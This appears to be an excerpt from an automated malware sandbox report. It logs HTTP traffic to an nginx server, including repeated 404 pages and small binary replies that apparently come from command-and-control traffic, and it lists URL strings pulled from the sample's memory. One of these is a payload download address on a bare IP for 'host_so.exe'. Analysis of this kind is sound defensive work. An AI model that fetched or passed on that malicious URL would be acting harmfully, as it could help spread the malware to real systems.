                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2d 5e 24 17 a6 61 44 a2 ae 09 ab c8 ad ac 2b 98 2b 9a ed 33 5e 14 98 8f c1 cb 7c d1 Data Ascii: #\-^$aD++3^|
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2b 58 24 17 a0 6d 44 af a8 09 a2 cc b6 e5 32 9d 20 c1 e0 2a 0b 19 9a c4 8a d6 61 Data Ascii: #\+X$mD2 *a
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:23:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 20 5a 24 14 a4 6a 44 a9 ab 14 bd cc b1 fb 6d 87 2a d3 ab 77 5f 07 98 d9 8a da 63 c6 2a 1d 01 8b 0a 8c 5e 6e 55 53 b5 91 73 f2 73 ed 44 19 13 Data Ascii: #\ Z$jDm*w_c*^nUSssD
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:23:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:24:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:24:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:24:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:24:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:24:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:24:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:24:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:25:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:25:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:25:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:25:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:25:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:25:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:25:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:25:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:25:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:25:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                Source: F441.exe, 00000006.00000003.2351445526.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.54/
                Source: F441.exe, 00000006.00000003.2351445526.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.54/S
                Source: F441.exe, 00000006.00000003.2351445526.0000000000573000.00000004.00000020.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2416372141.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, F441.exe, 00000006.00000002.2558054153.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2351445526.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.54/file/host_so.exe
                Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: explorer.exe, 00000001.00000000.1692944152.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1694837986.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                Source: F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: explorer.exe, 00000001.00000000.1692944152.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1694837986.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                Source: explorer.exe, 00000001.00000000.1692944152.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1694837986.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                Source: F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: explorer.exe, 00000001.00000000.1692944152.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1694837986.000000000982D000.00000004.00000001.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.drString found in binary or memory: http://ocsp.digicert.com0
                Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.drString found in binary or memory: http://ocsp.digicert.com0A
                Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.drString found in binary or memory: http://ocsp.digicert.com0C
